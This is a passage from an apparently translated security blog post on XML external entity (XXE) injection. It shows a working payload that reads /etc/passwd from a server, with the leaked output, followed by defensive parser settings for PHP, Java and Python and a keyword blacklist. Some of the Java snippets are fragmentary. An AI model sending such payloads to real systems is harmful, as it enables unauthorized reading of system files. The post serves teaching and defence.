HTTP Response:

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 127

{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}

It can be found that the server can handle xml data, so we can use this to attack

Final request and response:

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467

{"error": "no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....

6. How XXE defends

Option 1: Use the language-recommended method of disabling external entities

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);

.setFeature("http://xml.org/sax/features/external-general-entities",false)

.setFeature("http://xml.org/sax/features/external-parameter-entities",false);

Python:

from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

Solution 2: Manual blacklist filtering (not recommended)

Filter keywords:

<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC

7. Summary

Made a new understanding of the XXE vulnerability, and made corresponding actual combat tests on some of the details. The focus is on the use of netdoc and the use of the jar protocol. The use of the jar protocol is amazing, and there are relatively few online materials. I tested it It also took a long time, and I hope that there will be real cases, and the way of utilization still needs the efforts of masters.

Your knowledge determines your attack surface

Guess you like

Origin blog.csdn.net/jazzz98/article/details/130425153